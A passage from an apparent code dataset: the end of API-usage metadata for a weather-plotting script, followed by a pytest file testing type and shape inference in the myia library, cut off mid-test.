"matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 62, "usage_type": "call"}, {"api_name": "siphon.catalog.TDSCatalog", "line_number": 73, "usage_type": "call"}, {"api_name": "siphon.catalog.TDSCatalog", "line_number": 75, "usage_type": "call"}, {"api_name": "siphon.ncss.NCSS", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 83, "usage_type": "call"}, {"api_name": "netCDF4.Dataset", "line_number": 101, "usage_type": "call"}, {"api_name": "scipy.ndimage.filters.gaussian_filter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "scipy.ndimage.filters.gaussian_filter", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contour", 
"line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.contour", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "os.system", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "os.system", "line_number": 183, "usage_type": "call"}, {"api_name": "os.system", "line_number": 184, "usage_type": "call"}, {"api_name": "os.system", "line_number": 185, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot.close", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 210, "usage_type": "call"}, {"api_name": "netCDF4.num2date", "line_number": 222, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 246, "usage_type": "call"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 278, "usage_type": "call"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 314, "usage_type": "call"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 319, "usage_type": "call"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 354, "usage_type": "call"}, {"api_name": "netCDF4.num2date", "line_number": 367, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 373, "usage_type": "call"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 383, "usage_type": "call"}]} +{"seq_id": "545487942", "text": "\nimport pytest\nimport operator\nimport numpy as np\n\nfrom types import SimpleNamespace\n\nfrom myia.pipeline import scalar_pipeline, standard_pipeline\nfrom myia.composite import hyper_add, zeros_like, grad, list_map, tail\nfrom myia.debug.traceback import print_inference_error\nfrom myia.dtype import Array as A, Int, Float, TypeType, External, \\\n Number, Class, Problem, EnvType as Env, JTagged as JT\nfrom myia.hypermap import HyperMap\nfrom myia.infer import ANYTHING, VOID, InferenceError, register_inferrer, \\\n Contextless, CONTEXTLESS\nfrom myia.ir import Graph, MultitypeGraph\nfrom myia.pipeline import pipeline_function\nfrom myia.prim import Primitive, ops as P\nfrom myia.dshape import TupleShape, ListShape, ClassShape, NOSHAPE\nfrom myia.prim.py_implementations import \\\n scalar_add, scalar_mul, scalar_lt, list_map as list_map_prim, \\\n hastype, typeof, scalar_usub, dot, distribute, shape, array_map, \\\n array_scan, array_reduce, reshape, partial as myia_partial, identity, \\\n bool_and, bool_or, switch, scalar_to_array, broadcast_shape, \\\n tuple_setitem, list_setitem, scalar_cast, list_reduce, \\\n env_getitem, env_setitem, embed, J, Jinv, array_to_scalar, \\\n transpose\nfrom myia.utils import RestrictedVar, newenv\n\nfrom .common import B, T, L, F, i16, i32, i64, u64, f16, f32, f64, \\\n li32, li64, lf64, ai16, ai32, ai64, af16, af32, af64, Nil, \\\n Point, Point_t, Point3D, Point3D_t, Thing, Thing_f, Thing_ftup, mysum\n\n\ndef t(tt):\n return {'type': tt}\n\n\ndef ai64_of(*shp):\n return {'type': ai64, 'shape': shp}\n\n\ndef ai32_of(*shp):\n return {'type': ai32, 'shape': shp}\n\n\ndef af64_of(*shp):\n return {'type': af64, 'shape': 
shp}\n\n\ndef af32_of(*shp):\n return {'type': af32, 'shape': shp}\n\n\ndef af16_of(*shp):\n return {'type': af16, 'shape': shp}\n\n\n########################\n# Temporary primitives #\n########################\n\n\npyimpl_test = {}\nvalue_inferrer_cons_test = {}\ntype_inferrer_cons_test = {}\nshape_inferrer_cons_test = {}\n\n\ndef _test_op(cls):\n import inspect\n op = Primitive(cls.__name__)\n nargs = len(inspect.getfullargspec(cls.impl).args)\n pyimpl_test[op] = cls.impl\n for method in dir(cls):\n pfx = 'infer_'\n if method.startswith(pfx):\n track = method[len(pfx):]\n if track == 'type':\n cons = type_inferrer_cons_test\n elif track == 'value':\n cons = value_inferrer_cons_test\n elif track == 'shape':\n cons = shape_inferrer_cons_test\n else:\n raise Exception(f'Unknown track to infer: {track}')\n inffn = getattr(cls, method)\n register_inferrer(op, nargs=nargs, constructors=cons)(inffn)\n return op\n\n\n# Ternary arithmetic op\n\n\n@_test_op\nclass _tern:\n def impl(x, y, z):\n return x + y + z\n\n async def infer_type(track, x, y, z):\n return await track.will_check((Int, Float), x, y, z)\n\n async def infer_shape(track, x, y, z):\n return NOSHAPE\n\n\n# Coercion\n\n\n@_test_op\nclass _to_i64:\n def impl(x):\n return int(x)\n\n async def infer_type(track, x):\n return Int[64]\n\n async def infer_shape(track, x):\n return NOSHAPE\n\n\n# Unification tricks\n\n\n@_test_op\nclass _unif1:\n def impl(x):\n return x\n\n async def infer_type(track, x):\n rv = RestrictedVar({i16, f32})\n return track.engine.loop.create_var(rv, None, 0)\n\n async def infer_shape(track, x):\n return NOSHAPE\n\n\n@_test_op\nclass _unif2:\n def impl(x):\n return x\n\n async def infer_type(track, x):\n rv = RestrictedVar({i16, f64})\n return track.engine.loop.create_var(rv, None, 0)\n\n async def infer_shape(track, x):\n return NOSHAPE\n\n\ninfer_pipeline = scalar_pipeline.select(\n 'parse', 'infer'\n).configure({\n 'py_implementations': pyimpl_test,\n 'inferrer.erase_value': False,\n 'inferrer.tracks.value.max_depth': 10,\n 'inferrer.tracks.value.constructors': value_inferrer_cons_test,\n 'inferrer.tracks.type.constructors': type_inferrer_cons_test,\n 'inferrer.tracks.shape.constructors': shape_inferrer_cons_test,\n})\n\n\ninfer_pipeline_std = standard_pipeline.select(\n 'parse', 'infer'\n).configure({\n 'py_implementations': pyimpl_test,\n 'inferrer.erase_value': False,\n 'inferrer.tracks.value.max_depth': 10,\n 'inferrer.tracks.value.constructors': value_inferrer_cons_test,\n 'inferrer.tracks.type.constructors': type_inferrer_cons_test,\n 'inferrer.tracks.shape.constructors': shape_inferrer_cons_test,\n})\n\n\ndef _is_exc_type(cls):\n return isinstance(cls, type) and issubclass(cls, Exception)\n\n\ndef parse_test_spec(tests_spec):\n\n tests = []\n\n for main_track, ts in tests_spec.items():\n if not isinstance(ts, list):\n ts = [ts]\n for t in ts:\n test = []\n for entry in t:\n if isinstance(entry, dict) or _is_exc_type(entry):\n test.append(entry)\n else:\n test.append({main_track: entry})\n tests.append((main_track, test))\n\n return tests\n\n\ndef inferrer_decorator(pipeline):\n def infer(**tests_spec):\n\n tests = parse_test_spec(tests_spec)\n\n def decorate(fn):\n def run_test(spec):\n main_track, (*args, expected_out) = spec\n\n print('Args:')\n print(args)\n\n required_tracks = [main_track]\n\n def out():\n pip = pipeline.configure({\n 'inferrer.required_tracks': required_tracks,\n })\n\n res = pip.make()(input=fn, argspec=args)\n rval = res['outspec']\n\n print('Output of inferrer:')\n print(rval)\n 
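# only the inferred output spec is handed back for comparison against the expectation\n                    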
return rval\n\n print('Expected:')\n print(expected_out)\n\n if _is_exc_type(expected_out):\n try:\n out()\n except expected_out as e:\n if issubclass(expected_out, InferenceError):\n print_inference_error(e)\n else:\n pass\n else:\n raise Exception(\n f'Expected {expected_out}, got: (see stdout).'\n )\n else:\n try:\n assert out() == expected_out\n except InferenceError as e:\n print_inference_error(e)\n raise\n\n m = pytest.mark.parametrize('spec', list(tests))(run_test)\n m.__orig__ = fn\n return m\n\n return decorate\n\n return infer\n\n\ninfer = inferrer_decorator(infer_pipeline)\ninfer_std = inferrer_decorator(infer_pipeline_std)\n\n\ntype_signature_arith_bin = [\n (i64, i64, i64),\n (f64, f64, f64),\n (i64, f64, InferenceError),\n (B, B, InferenceError),\n]\n\n\ndef test_contextless():\n C = CONTEXTLESS\n assert Contextless.empty() is C\n assert C.filter(Graph()) is C\n assert C.add(Graph(), []) is C\n\n\n@infer(type=[(i64, i64)],\n value=[(89, 89), ([], TypeError)])\ndef test_identity(x):\n return x\n\n\n@infer(type=[(i64,)], value=[(16,)])\ndef test_constants_int():\n return 2 * 8\n\n\n@infer(type=[(f64,)], value=[(12.0,)])\ndef test_constants_float():\n return 1.5 * 8.0\n\n\n@infer(type=[(f64,)], value=[(12.0,)])\ndef test_constants_intxfloat():\n return 8 * 1.5\n\n\n@infer(type=[(f64,)], value=[(12.0,)])\ndef test_constants_floatxint():\n return 1.5 * 8\n\n\n@infer(type=type_signature_arith_bin)\ndef test_prim_mul(x, y):\n return x * y\n\n\n@infer(type=[\n (i64, i64, i64, i64),\n (f64, f64, f64, f64),\n # Three different inconsistent patterns below\n (f64, f64, i64, InferenceError),\n (i64, f64, f64, InferenceError),\n (f64, f64, i64, InferenceError),\n # Test too few/too many arguments below\n (i64, InferenceError),\n (i64, i64, i64, i64, InferenceError),\n])\ndef test_prim_tern(x, y, z):\n return _tern(x, y, z)\n\n\n@infer(type=[(i64, i64), (f64, f64), (B, InferenceError)])\ndef test_prim_usub(x):\n return -x\n\n\n@infer_std(type=[\n (i64, InferenceError),\n (f32, f32),\n (f64, f64),\n (af64_of(2, 5), af64),\n (B, InferenceError)\n])\ndef test_prim_log(x):\n return np.log(x)\n\n\n@infer(\n type=[\n (B, f64, f64, f64),\n (B, f64, i64, InferenceError),\n ({'value': True}, f64, i64, f64),\n ({'value': False}, f64, i64, i64),\n # Note: scalar_pipeline will not convert i64 to bool,\n # so the following is an InferenceError even though it\n # will work with the standard_pipeline\n (i64, f64, f64, InferenceError),\n ],\n value=[\n (True, 7, 4, 49),\n (False, 7, 4, 16),\n ({'type': B, 'value': ANYTHING}, 7, 4, ANYTHING),\n ]\n)\ndef test_if(c, x, y):\n if c:\n return x * x\n else:\n return y * y\n\n\n@infer(type=type_signature_arith_bin)\ndef test_if2(x, y):\n if x > y:\n return x\n else:\n return y\n\n\n@infer(\n type=[\n (i64, i64, i64),\n (i64, f64, f64),\n (f64, f64, f64),\n ({'value': 1_000_000}, i64, i64)\n ],\n value=[\n (2, 3, 27),\n (1_000_000, 3, ANYTHING)\n ]\n)\ndef test_while(x, y):\n rval = y\n while x > 0:\n rval = rval * y\n x = x - 1\n return rval\n\n\n@infer(\n type=[\n (li64, i64, i64),\n (li64, f64, InferenceError),\n (i64, i64, InferenceError),\n (T[i64, i64, i64], i64, i64),\n (T[i64, f64, i64], i64, InferenceError),\n ]\n)\ndef test_for(xs, y):\n rval = y\n for x in xs:\n rval = rval + x\n return rval\n\n\n@infer(type=(i64, f64, T[i64, f64]))\ndef test_nullary_closure(x, y):\n def make(z):\n def inner():\n return z\n return inner\n a = make(x)\n b = make(y)\n return a(), b()\n\n\n@infer(type=(i64, f64, T[i64, f64]))\ndef test_merge_point(x, y):\n def mul2():\n 
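# primitives are first-class values here: mul2 hands back scalar_mul itself\n        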
return scalar_mul\n m = mul2()\n return m(x, x), m(y, y)\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_not_enough_args_prim(x):\n return scalar_mul(x)\n\n\n@infer(type=[(i64, i64, i64, InferenceError)])\ndef test_too_many_args_prim(x, y, z):\n return scalar_mul(x, y, z)\n\n\n@infer(type=[(i64, InferenceError)])\ndef test_not_enough_args(x):\n def g(x, y):\n return x * y\n return g(x)\n\n\n@infer(type=[(i64, i64, InferenceError)])\ndef test_too_many_args(x, y):\n def g(x):\n return x * x\n return g(x, y)\n\n\n@infer(type=(i64, f64, T[i64, f64]),\n shape=[(t(i64), t(f64), TupleShape((NOSHAPE, NOSHAPE))),\n (t(T[i64, i64]), t(f64),\n TupleShape((TupleShape((NOSHAPE, NOSHAPE)), NOSHAPE)))])\ndef test_tup(x, y):\n return (x, y)\n\n\n@infer(type=[(i64, i64, L[i64]),\n (i64, f64, InferenceError)],\n shape=[({'type': i64, 'shape': NOSHAPE},\n {'type': i64, 'shape': NOSHAPE},\n ListShape(NOSHAPE)),\n ({'type': L[A[i64]], 'shape': ListShape((8, 3))},\n {'type': L[A[i64]], 'shape': ListShape((4, 3))},\n ListShape(ListShape((ANYTHING, 3)))),\n (ai64_of(4, 7), ai64_of(4, 7), ListShape((4, 7))),\n (ai64_of(4, 7), ai64_of(9, 7), ListShape((ANYTHING, 7)))])\ndef test_list(x, y):\n return [x, y]\n\n\n@infer(type=[(i64, i64, L[i64]),\n (f64, f64, L[f64]),\n (lf64, lf64, InferenceError),\n (i64, f64, InferenceError)])\ndef test_list_and_scalar(x, y):\n return [x, y, 3]\n\n\n@infer(type=[(L[Problem[VOID]],)],\n shape=[(InferenceError,)])\ndef test_list_empty():\n return []\n\n\n@infer(\n type=[\n (T[i64, f64], i64),\n (lf64, InferenceError),\n (af64_of(2, 5), InferenceError),\n (i64, InferenceError),\n ],\n value=[\n ((), 0),\n ((1,), 1),\n ((1, 2), 2),\n ]\n)\ndef test_tuple_len(xs):\n return P.tuple_len(xs)\n\n\n@infer(\n type=[\n (T[i64, f64], InferenceError),\n (lf64, i64),\n (af64_of(2, 5), InferenceError),\n (i64, InferenceError),\n ],\n)\ndef test_list_len(xs):\n return P.list_len(xs)\n\n\n@infer(\n type=[\n (T[i64, f64], InferenceError),\n (lf64, InferenceError),\n (af64_of(2, 5), i64),\n (i64, InferenceError),\n ],\n)\ndef test_array_len(xs):\n return P.array_len(xs)\n\n\n@infer(type=[(T[i64, f64], T[f64]),\n (T[f64, i64], T[i64]),\n (T[()], InferenceError),\n (f64, InferenceError)],\n shape=[(t(T[f64, i64]), TupleShape((NOSHAPE,))),\n (t(T[i64, T[i64, f64]]),\n TupleShape((TupleShape((NOSHAPE, NOSHAPE)),)))])\ndef test_tail_tuple(tup):\n return tail(tup)\n\n\n@infer(type=[(T[i64], T[f64], InferenceError)])\ndef test_tail_tuple_wrong(x, y):\n return tail(x, y)\n\n\n@infer(type=[(i64, f64, i64), (f64, i64, f64)],\n shape=(t(i64), t(f64), NOSHAPE))\ndef test_tuple_getitem(x, y):\n return (x, y)[0]\n\n\n@infer(type=[(i64, f64, f64), (f64, i64, i64)])\ndef test_tuple_getitem_negative(x, y):\n return (x, y)[-1]\n\n\n@infer(type=[(i64, f64, InferenceError)])\ndef test_tuple_outofbound(x, y):\n return (x, y)[2]\n\n\n@infer(type=[(i64, f64, InferenceError)])\ndef test_tuple_outofbound_negative(x, y):\n return (x, y)[-3]\n\n\n@infer(\n type=[\n (li64, i64, i64),\n (lf64, i64, f64),\n (lf64, f64, InferenceError),\n (f64, i64, InferenceError),\n (T[i64, f64], i64, InferenceError)\n ]\n)\ndef test_list_getitem(xs, i):\n return xs[i]\n\n\n@infer(\n type=[\n (T[i64, i64], {'value': 1}, f64, T[i64, f64]),\n (T[i64, i64, f64], {'value': 1}, f64, T[i64, f64, f64]),\n (T[i64], {'value': 1}, f64, InferenceError),\n (T[i64], {'type': f64, 'value': 0}, f64, InferenceError),\n (T[i64], i64, f64, InferenceError),\n ]\n)\ndef test_tuple_setitem(xs, idx, x):\n return tuple_setitem(xs, idx, x)\n\n\n@infer(\n type=[\n 
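# (xs, idx, x) -> result: idx must be i64 and x must match the element type\n        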
(li64, i64, i64, li64),\n (li64, f64, i64, InferenceError),\n (li64, i64, f64, InferenceError),\n ]\n)\ndef test_list_setitem(xs, idx, x):\n return list_setitem(xs, idx, x)\n\n\n@infer(type=(i64, f64, T[i64, f64]))\ndef test_multitype_function(x, y):\n def mul(a, b):\n return a * b\n return (mul(x, x), mul(y, y))\n\n\n@infer(type=type_signature_arith_bin)\ndef test_closure(x, y):\n def mul(a):\n return a * x\n return mul(x) + mul(y)\n\n\n@infer(\n type=[\n (i64, i64, i64, i64, T[i64, i64]),\n (f64, f64, f64, f64, T[f64, f64]),\n (i64, i64, f64, f64, T[i64, f64]),\n (i64, f64, f64, f64, InferenceError),\n (i64, i64, i64, f64, InferenceError),\n ]\n)\ndef test_return_closure(w, x, y, z):\n def mul(a):\n def clos(b):\n return a * b\n return clos\n return (mul(w)(x), mul(y)(z))\n\n\n@infer(type=[(i64, i64), (f64, f64)])\ndef test_fact(n):\n def fact(n):\n if n <= 1:\n return 1\n else:\n return n * fact(n - 1)\n return fact(n)\n\n\ndef even(n):\n if n == 0:\n return True\n else:\n return odd(n - 1)\n\n\ndef odd(n):\n if n == 0:\n return False\n else:\n return even(n - 1)\n\n\n@infer(type=[(i64, B), (f64, B)])\ndef test_even_odd(n):\n return even(n)\n\n\n@infer(type=[(i64, i64), (f64, f64)])\ndef test_pow10(x):\n v = x\n j = 0\n while j < 3:\n i = 0\n while i < 3:\n v = v * x\n i = i + 1\n j = j + 1\n return v\n\n\n@infer(\n type=[\n (i64, i64, i64, i64),\n (i64, f64, f64, f64)\n ]\n)\ndef test_choose_prim(i, x, y):\n\n def choose(i):\n if i == 0:\n return scalar_add\n else:\n return scalar_mul\n\n return choose(i)(x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64, InferenceError),\n ({'value': 0}, i64, i64, i64),\n ({'value': 1}, i64, i64, B),\n ]\n)\ndef test_choose_prim_incompatible(i, x, y):\n\n def choose(i):\n if i == 0:\n return scalar_add\n else:\n return scalar_lt\n\n return choose(i)(x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64, InferenceError),\n ({'value': 0}, i64, i64, i64),\n ({'value': 1}, i64, i64, B),\n ]\n)\ndef test_choose_incompatible(i, x, y):\n\n def add2(x, y):\n return x + y\n\n def lt2(x, y):\n return x < y\n\n def choose(i):\n if i == 0:\n return add2\n else:\n return lt2\n\n return choose(i)(x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64),\n (i64, f64, f64)\n ],\n shape=[\n (t(i64), t(i64), NOSHAPE)\n ]\n)\ndef test_choose_indirect(i, x):\n\n def double(x):\n return x + x\n\n def square(x):\n return x * x\n\n def choose(i):\n if i == 0:\n return double\n else:\n return square\n\n return choose(i)(x)\n\n\n@infer(\n type=[\n (i64, i64)\n ]\n)\ndef test_hof(x):\n\n def double(x):\n return x + x\n\n def square(x):\n return x * x\n\n def hof(f, tup):\n return f(tup[0]) + f(tup[1])\n\n return hof(double, (x + 1, x + 2)) + hof(square, (x + 3, x + 4))\n\n\n@infer(\n type=[\n (i64, i64, i64),\n (i64, f64, InferenceError)\n ],\n value=[\n (-1, 3, 36),\n (1, 3, 6),\n ({'type': i64, 'value': ANYTHING}, 3, ANYTHING)\n ]\n)\ndef test_hof_2(c, x):\n\n def identity(x):\n return x\n\n def double(x):\n return x + x\n\n def square(x):\n return x * x\n\n def pick(c):\n if c < 0:\n return square\n elif c == 0:\n return _to_i64\n else:\n return double\n\n def pick2(c, f):\n if c < 0:\n return f\n else:\n return identity\n\n return pick2(c, pick(c))(x + x)\n\n\n@infer(\n type=[\n (i64, T[T[i64, i64], T[B, B]])\n ]\n)\ndef test_hof_3(x):\n\n def double(x):\n return x + x\n\n def is_zero(x):\n return x == 0\n\n def hof(f, tup):\n return (f(tup[0]), f(tup[1]))\n\n return (hof(double, (x + 1, x + 2)), hof(is_zero, (x + 3, x + 4)))\n\n\n@infer(\n type=[\n (i64, i64, InferenceError),\n ({'value': -1}, 
i64, i64),\n ({'value': 1}, i64, T[i64, i64]),\n ]\n)\ndef test_hof_4(x, y):\n\n def double(x):\n return x + x\n\n def hof_sum(f, tup):\n return f(tup[0]) + f(tup[1])\n\n def hof_tup(f, tup):\n return (f(tup[0]), f(tup[1]))\n\n def pick(x):\n if x < 0:\n return hof_sum\n else:\n return hof_tup\n\n f = pick(x)\n return f(double, (y + 3, y + 4))\n\n\n@infer(\n type=[\n (B, B, i64, i64, i64),\n (B, B, f64, f64, InferenceError),\n ({'value': True}, B, Nil, i64, i64),\n (B, {'value': True}, f64, f64, f64),\n (B, {'value': True}, i64, f64, InferenceError),\n ]\n)\ndef test_hof_5(c1, c2, x, y):\n\n def pick_hof(c):\n def hof_1(f):\n def wrap(x, y):\n return f(y)\n return wrap\n\n def hof_2(f):\n def wrap(x, y):\n return f(x)\n return wrap\n\n if c:\n return hof_1\n else:\n return hof_2\n\n def pick_f(c):\n if c:\n return scalar_usub\n else:\n return _to_i64\n\n return pick_hof(c1)(pick_f(c2))(x, y)\n\n\n@infer(\n type=[\n (i64, i64, i64)\n ]\n)\ndef test_func_arg(x, y):\n def g(func, x, y):\n return func(x, y)\n\n def h(x, y):\n return x + y\n return g(h, x, y)\n\n\n@infer(\n type=[\n (i64, InferenceError)\n ]\n)\ndef test_func_arg3(x):\n def g(func, x):\n z = func + x\n return func(z)\n\n def h(x):\n return x\n\n return g(h, x)\n\n\n@infer(\n type=[\n (i64, i64),\n (f64, f64),\n ]\n)\ndef test_func_arg4(x):\n def h(x):\n return x\n\n def g(fn, x):\n return fn(h, x)\n\n def t(fn, x):\n return fn(x)\n\n return g(t, x)\n\n\n@infer(type=(i64,), value=(4,))\ndef test_closure_deep():\n def g(x):\n def h():\n return x * x\n return h\n return g(2)()\n\n\n@infer(\n type=[\n (i64, i64, i64)\n ],\n value=[\n (5, 7, 15)\n ]\n)\ndef test_closure_passing(x, y):\n def adder(x):\n def f(y):\n return x + y\n return f\n\n a1 = adder(1)\n a2 = adder(2)\n\n return a1(x) + a2(y)\n\n\n@infer(type=[(B, B), (i64, InferenceError)])\ndef test_not(x):\n return not x\n\n\n@infer(value=[(2, 2, 8), (2, 3, 13)])\ndef test_cover_limitedvalue_eq(x, y):\n\n def square(x):\n return x * x\n\n return square(x) + square(y)\n\n\n@infer(\n type=[\n (li64, lf64, T[li64, lf64]),\n (li64, f64, InferenceError),\n ]\n)\ndef test_list_map_prim(xs, ys):\n\n def square(x):\n return x * x\n\n return list_map_prim(square, xs), list_map_prim(square, ys)\n\n\n@infer(\n type=[\n (li64, li64, li64),\n (li64, lf64, InferenceError),\n ]\n)\ndef test_list_map_prim2(xs, ys):\n\n def mulm(x, y):\n return x * -y\n\n return list_map_prim(mulm, xs, ys)\n\n\n@infer(\n type=[(i64, B)],\n value=[(t(i64), True),\n (t(f64), False)]\n)\ndef test_hastype_simple(x):\n return hastype(x, i64)\n\n\n@infer(\n type=[\n (i64, i64, InferenceError),\n (i64, {'type': TypeType, 'value': Int[64]}, B),\n ],\n value=[\n ({'type': i64, 'value': ANYTHING},\n {'type': TypeType, 'value': ANYTHING}, InferenceError),\n ({'type': i64, 'value': ANYTHING},\n {'type': TypeType, 'value': i64}, {'value': True}),\n ({'type': f64, 'value': ANYTHING},\n {'type': TypeType, 'value': i64}, {'value': False}),\n ({'type': T[i64, i64], 'value': ANYTHING},\n {'type': TypeType, 'value': T[i64, i64]}, {'value': True}),\n ({'type': T[i64, i64], 'value': ANYTHING},\n {'type': TypeType, 'value': T[Number, Number]}, {'value': True}),\n ]\n)\ndef test_hastype(x, y):\n return hastype(x, y)\n\n\n@infer(\n type=[(i64, TypeType)],\n value=[(t(i64), i64),\n (t(f64), f64)]\n)\ndef test_typeof(x):\n return typeof(x)\n\n\nTf4 = T[f64, f64, f64, f64]\n\n\n@infer(\n type=[\n (i64, i64),\n (f64, i64),\n (ai64_of(2, 5), f64),\n (af64_of(2, 5), i64),\n (T[i64, i64], i64),\n (T[f64, f64, i64, i64], i64),\n (Tf4, 
Tf4),\n (T[i64, T[f64, i64]], i64),\n (li64, f64),\n (T[i64, li64], i64),\n (Point_t, i64),\n (Point3D_t, i64),\n (Thing_ftup, T[f64, f64]),\n (Thing_f, i64),\n ],\n value=[\n (5, 5),\n (6.0, 6),\n ((5, 7, (3.2, 1.8)), 16),\n (Point(5, 7), 35),\n (Point3D(5, 7, 9), 0),\n ]\n)\ndef test_hastype_2(x):\n\n def f(x):\n if hastype(x, i64):\n return x\n elif hastype(x, f64):\n return f(_to_i64(x))\n elif hastype(x, ai64):\n return 0.0\n elif hastype(x, Point_t):\n return f(x.x) * f(x.y)\n elif hastype(x, Nil):\n return 0\n elif hastype(x, Tf4):\n return x\n elif hastype(x, T):\n return f(x[0]) + f(tail(x))\n elif hastype(x, L):\n return 1.0\n elif hastype(x, Thing_ftup):\n return x.contents\n else:\n return 0\n\n return f(x)\n\n\n@infer_std(\n type=[\n (li64, i64, li64),\n (lf64, i64, InferenceError),\n ({'type': L[ai64], 'shape': ListShape((2, 3))}, i64, L[ai64]),\n ],\n shape=[(t(li64), t(i64), ListShape(NOSHAPE)),\n ({'type': L[ai64], 'shape': ListShape((2, 3))}, ai64_of(2, 3),\n ListShape((2, 3)))]\n)\ndef test_map_2(xs, z):\n\n def adder(x):\n def f(y):\n return x + y\n return f\n\n return list_map_prim(adder(z), xs)\n\n\ndef _square(x):\n return x * x\n\n\n@infer(type=(InferenceError,))\ndef test_nonexistent_variable():\n return xxxx + yz # noqa\n\n\nclass helpers:\n add = operator.add\n mul = operator.mul\n square = _square\n\n\nclass data:\n a25 = np.ones((2, 5))\n\n\n@infer(\n type=[\n (i64, i64, T[i64, i64]),\n (i64, f64, 